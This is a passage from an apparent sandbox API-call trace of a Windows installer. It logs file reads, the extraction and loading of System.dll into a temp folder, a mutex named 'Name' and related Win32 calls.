lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.833] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x421430, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421430*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0157.834] SetFilePointer (in: hFile=0x174, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x18fdb4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x18fdb4*, lpNumberOfBytesRead=0x18fd30*=0x4, lpOverlapped=0x0) returned 1 [0157.834] GetTickCount () returned 0x2fd9f [0157.834] ReadFile (in: hFile=0x174, lpBuffer=0x415428, nNumberOfBytesToRead=0x1769, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x415428*, lpNumberOfBytesRead=0x18fd30*=0x1769, lpOverlapped=0x0) returned 1 [0157.835] GetTickCount () returned 0x2fd9f [0157.835] SetFilePointer (in: hFile=0x174, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa789 [0157.835] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75c90000 [0157.835] GetProcAddress (hModule=0x75c90000, lpProcName="GetUserDefaultUILanguage") returned 0x75ca44ab [0157.835] GetUserDefaultUILanguage () returned 0x409 [0157.835] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.835] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.835] lstrlenA (lpString="Name") returned 4 [0157.835] lstrcpynA (in: lpString1=0x42ec00, lpString2="Name Setup", iMaxLength=1024 | out: lpString1="Name Setup") returned="Name Setup" [0157.835] SetWindowTextA (hWnd=0x0, lpString="Name Setup") returned 0 [0157.835] lstrcpynA (in: lpString1=0x314ffc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0157.835] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x435400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0xd022d [0157.836] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrlenA (lpString="") returned 0 [0157.836] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.836] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrcmpiA (lpString1="", lpString2="") returned 0 [0157.839] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrlenA (lpString="") returned 0 [0157.839] lstrcpynA (in: lpString1=0x2fa28c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.839] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.839] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.839] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.839] GetTickCount () returned 0x2fdaf [0157.839] GetTempFileNameA (in: lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpPrefixString="nst", uUnique=0x0, lpTempFileName=0x430000 | out: lpTempFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 0xfdb0 [0157.840] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.840] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrcpynA (in: lpString1=0x42bc78, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.840] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.840] FindFirstFileA (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0157.840] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0157.840] DeleteFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp")) returned 1 [0157.841] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.841] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.841] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.841] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1")) returned 0x10 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.841] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata")) returned 0x2012 [0157.841] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0157.841] GetLastError () returned 0xb7 [0157.842] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local")) returned 0x2010 [0157.842] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.842] GetLastError () returned 0xb7 [0157.842] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0157.842] GetModuleHandleA (lpModuleName="SHELL32") returned 0x76880000 [0157.842] GetProcAddress (hModule=0x76880000, lpProcName=0x2a8) returned 0x768d44f5 [0157.842] IsUserAnAdmin () returned 0 [0157.842] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp"), lpSecurityAttributes=0x0) returned 1 [0157.843] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: lpString1=0x436800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrcpynA (in: lpString1=0x430000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.843] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.843] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.843] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.843] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.843] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0xffffffff [0157.843] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0157.843] SetFilePointer (in: hFile=0x174, lDistanceToMove=42889, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa789 [0157.844] ReadFile (in: hFile=0x174, lpBuffer=0x18fbd8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fb54, lpOverlapped=0x0 | out: lpBuffer=0x18fbd8*, lpNumberOfBytesRead=0x18fb54*=0x4, lpOverlapped=0x0) returned 1 [0157.844] GetTickCount () returned 0x2fdaf [0157.844] ReadFile (in: hFile=0x174, lpBuffer=0x415428, nNumberOfBytesToRead=0x1aa2, lpNumberOfBytesRead=0x18fb54, lpOverlapped=0x0 | out: lpBuffer=0x415428*, lpNumberOfBytesRead=0x18fb54*=0x1aa2, lpOverlapped=0x0) returned 1 [0157.844] GetTickCount () returned 0x2fdaf [0157.844] MulDiv (nNumber=6818, nNumerator=100, nDenominator=6818) returned 100 [0157.844] wsprintfA (in: param_1=0x18fb70, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0157.844] WriteFile (in: hFile=0x180, lpBuffer=0x419428*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x18fb60, lpOverlapped=0x0 | out: lpBuffer=0x419428*, lpNumberOfBytesWritten=0x18fb60*=0x2e00, lpOverlapped=0x0) returned 1 [0157.845] CloseHandle (hObject=0x180) returned 1 [0157.846] lstrlenA (lpString="Name") returned 4 [0157.846] lstrcpynA (in: lpString1=0x2fa28c, lpString2="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e", iMaxLength=1024 | out: lpString1="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e") returned="kernel32::CreateMutexA(i 0, i 0, t \"Name\") i .r1 ?e" [0157.846] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.847] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.847] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.847] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.847] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x0 [0157.849] LoadLibraryExA (lpLibFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", hFile=0x0, dwFlags=0x8) returned 0x75710000 [0157.857] VirtualProtect (in: lpAddress=0x7571404c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x7571403c | out: lpflOldProtect=0x7571403c*=0x4) returned 1 [0157.857] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.858] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.858] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.858] lstrcpyA (in: lpString1=0x321fb0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0157.858] lstrcpynA (in: lpString1=0x314818, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.858] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.858] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexA") returned 0x75ca4c6b [0157.858] lstrlenA (lpString="CreateMutexA") returned 12 [0157.859] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexAA") returned 0x0 [0157.859] lstrcpynA (in: lpString1=0x2fa288, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.859] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.859] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Name") returned 0x180 [0157.859] GetLastError () returned 0x0 [0157.859] lstrcpynA (in: lpString1=0x321398, lpString2="Name", iMaxLength=1024 | out: lpString1="Name") returned="Name" [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.859] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="384") returned 3 [0157.859] lstrcpyA (in: lpString1=0x430400, lpString2="384" | out: lpString1="384") returned="384" [0157.859] wsprintfA (in: param_1=0x18fb28, param_2="%d" | out: param_1="0") returned 1 [0157.859] lstrcpynA (in: lpString1=0x2fa28c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.859] lstrcpynA (in: lpString1=0x432800, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrlenA (lpString="0") returned 1 [0157.860] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.860] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.860] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0157.860] lstrlenA (lpString="Name") returned 4 [0157.860] lstrcpynA (in: lpString1=0x42ec00, lpString2="Name Setup", iMaxLength=1024 | out: lpString1="Name Setup") returned="Name Setup" [0157.860] SetWindowTextA (hWnd=0x0, lpString="Name Setup") returned 0 [0157.860] lstrcpynA (in: lpString1=0x314ffc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0157.860] OleInitialize (pvReserved=0x0) returned 0x1 [0157.860] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0157.860] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0157.860] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.861] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0157.861] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1" (normalized: "c:\\users\\adu0vk~1")) returned 0x10 [0157.861] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0157.861] GetLastError () returned 0xb7 [0157.861] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData" (normalized: "c:\\users\\adu0vk~1\\appdata")) returned 0x2012 [0157.862] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0157.862] GetLastError () returned 0xb7 [0157.862] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local" (normalized: "c:\\users\\adu0vk~1\\appdata\\local")) returned 0x2010 [0157.862] CreateDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0157.862] GetLastError () returned 0xb7 [0157.862] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0157.862] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" [0157.862] SetCurrentDirectoryA (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0157.862] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.862] lstrlenA (lpString="") returned 0 [0157.862] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.863] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.863] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.863] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 